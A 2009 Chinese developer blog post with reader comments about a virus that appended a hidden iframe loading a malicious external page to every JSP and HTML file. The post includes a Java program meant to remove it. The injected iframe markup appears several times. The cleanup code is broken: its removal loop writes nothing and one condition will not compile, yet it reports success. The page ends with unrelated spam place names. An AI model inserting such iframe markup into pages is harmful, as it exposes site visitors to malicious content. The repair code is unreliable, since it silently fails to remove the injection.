冷面閻羅
          

          低調(diào)做人&&高調(diào)做事
          

          

          

          隨筆 - 208, 文章 - 3, 評(píng)論 - 593, 引用 - 0
          

          


          		
	
          

          

          
	
          
		
			
          
				數(shù)據(jù)加載中……
			
          
		          		
		
			
          
				
					
	
          
		
          
			中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫
		
          
		
          
		      上周末,機(jī)器中毒了,起初自己沒(méi)有發(fā)現(xiàn),后來(lái)寫代碼發(fā)現(xiàn)運(yùn)行jsp文件,機(jī)器變的奇慢務(wù)必,后來(lái)以為是機(jī)器慢,就把qq、msn 等工具全關(guān)掉了,發(fā)現(xiàn)還是不行,后來(lái)把上網(wǎng)的代理關(guān)掉時(shí)候發(fā)現(xiàn)正常了;再一看jsp文件發(fā)現(xiàn)全部被改寫了,在文件最后一行加上
          

          <iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
          
      于是上網(wǎng)找殺毒軟件,剛開(kāi)始用的諾頓(公式規(guī)定必須安裝),發(fā)現(xiàn)不行就換別的軟件,可是病毒不讓你安裝別的殺毒軟件,甚至打開(kāi)有解決方法的網(wǎng)頁(yè),都會(huì)將ie關(guān)閉。
          
  
          
     后來(lái)同事給了360,算是把病毒穩(wěn)定了,可是我的jsp、html文件都被改寫了,這時(shí)想到寫程序解決,下面是我弄的java程序刪除文件中被增加的iframe。
          

          import java.io.File;
          
          import java.io.RandomAccessFile;
          

          
          public class RepairPage
          
          {
          

          
              private static int num;
          

          
              private String worm = "<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>";
          

          
              public void repair(File page)
          
              {
          
                  //System.out.println("Try File:"+page.getPath());
          
                  try
          
                  {
          
            RandomAccessFile r           = new RandomAccessFile(page, "rw");
          
                      if (r.length() < 68)
          
                          return;
          
            r.seek(r.length()           - 68);//跳到最后一行
          
                      String shit = r.readLine();
          
                      if (shit.equals(worm))
          
                      {
          
                          //System.out.println("shit content:"+shit);
          
                          System.out.println("修復(fù)損壞文件:" + page.getPath());
          
                r.seek(r.length()           - 68);
          
                          for (int i = 0; i < worm.length(); i++)
          
                          {
          
                    r.writeBytes(          "");
          
                }
          
                num          ++;
          
            }
          
        }
          
                  catch (Exception e)
          
                  {
          
            e.printStackTrace();
          
        }
          
    }
          

          
              public void doDir(File dir)
          
              {
          
                  if (dir.canRead())
          
                  {
          
                      if (dir.isDirectory())
          
                      {
          
                String[] files           = dir.list();
          
                          if (files != null)
          
                          {
          
                              for (int i = 0; i < files.length; i++)
          
                              {
          
                        doDir(          new File(dir, files[i]));// 遞歸
          
                              }
          
                }
          
            }
          
                      else
          
                      {// is File
          
                          String name = dir.getName();
          
                          if (name.endsWith("jsp"|| name.endsWith("html"|| name.endsWith("htm"))
          
                    repair(dir);
          
            }
          
        }
          
    }
          

          
              public static void main(String[] args)
          
              {
          

          
        File dir           = new File("E://program//guizhou//09檢試源碼//web//");
          
        RepairPage repair           = new RepairPage();
          
        repair.doDir(dir);
          
        System.out.println(          "修復(fù)成功完成,修復(fù)文件數(shù):" + repair.num);
          
    }
          

          
}
          

          

		
          
		
          
			posted on 2009-02-17 10:49 冷面閻羅 閱讀(1294) 評(píng)論(8)  編輯  收藏  
		
          
	
          
	
	


	


          
	    
    


          

          評(píng)論
          
	
	
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫[未登錄](méi)  回復(fù)  更多評(píng)論
					  
				
          
				恩,我也中過(guò)這個(gè)病毒。我中的時(shí)候每個(gè)網(wǎng)頁(yè)的iframe里面src的值都不一樣的。
				
          
					2009-02-17 11:35 | haha
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				我現(xiàn)在中的就是這個(gè)毒但是用360還是殺不了病毒。

          360發(fā)現(xiàn)沒(méi)有病毒,但是用vs新建一個(gè)網(wǎng)頁(yè)文件他又會(huì)在最后面加上這個(gè)<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
				
          
					2009-02-18 10:06 | bigeng
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				操,不會(huì)CVS重新down一份么?
				
          
					2009-02-18 10:19 | hdware
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				呵呵,碰到過(guò),硬改代碼恢復(fù)的,痛苦
				
          
					2009-02-18 14:07 | jeasonzhao
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫[未登錄](méi)  回復(fù)  更多評(píng)論
					  
				
          
				媽的,上千頁(yè)面都有這個(gè)代碼,慘啊,怎么改啊
				
          
					2009-02-20 10:45 | dd
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				也中標(biāo)了,而且這個(gè)shit還在壓縮文件里面加了一個(gè)病毒文件"安裝.bat".

          另外請(qǐng)問(wèn)下500錯(cuò)誤之類的錯(cuò)誤信息頁(yè)面在哪個(gè)文件夾下面?或者是動(dòng)態(tài)生成的?
				
          
					2009-02-23 15:55 | tt
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				哦.另外問(wèn)下你這個(gè)程序是在什么環(huán)境下運(yùn)行的?

          還有好象這個(gè)病毒下載的東西把host文件也給改了,把殺軟的網(wǎng)址全指向本地,并且來(lái)了一句以下為惡意網(wǎng)站,殺了毒之后系統(tǒng)藍(lán)屏,這兩天真被弄死了
				
          
					2009-02-23 16:00 | tt
				
          
			
          
		
			
          
				
          
					# re: 中了一個(gè)很奇怪的病毒,所有的jsp文件均為改寫  回復(fù)  更多評(píng)論
					  
				
          
				這是ARP病毒,
				
          
					2010-05-15 14:06 | asfd
				
          
			
          
		

          





          





          


          

	
          
		
          
				
		
	
		
          
		
		
          只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
          
		
          
			
		
          
			
		
          
		
		
          
		


          

		          		
		
          
		
          			
		
		
		
		
          
		
          
		
		
          
		
          
			網(wǎng)站導(dǎo)航:
		
		
          
		
          
			
		
          	
		
          
			 
		
          
		
          
			
		
          
		
          
			
				
		
          		
	
          	

          



          

				
			
          
		          		
	
          
	
          
		
			

		
	
          

          


    







          
        
	




主站蜘蛛池模板:
阿坝|
浦城县|
瑞昌市|
恩平市|
湖口县|
磐石市|
龙南县|
林芝县|
佛冈县|
监利县|
鱼台县|
安庆市|
吉木乃县|
龙陵县|
巴林左旗|
广西|
庆云县|
哈密市|
商城县|
佛坪县|
连城县|
英德市|
雅江县|
大城县|
长乐市|
扎囊县|
永宁县|
正定县|
阳原县|
西藏|
西丰县|
福安市|
含山县|
漳州市|
万年县|
中超|
龙州县|
包头市|
黑山县|
新津县|
金山区|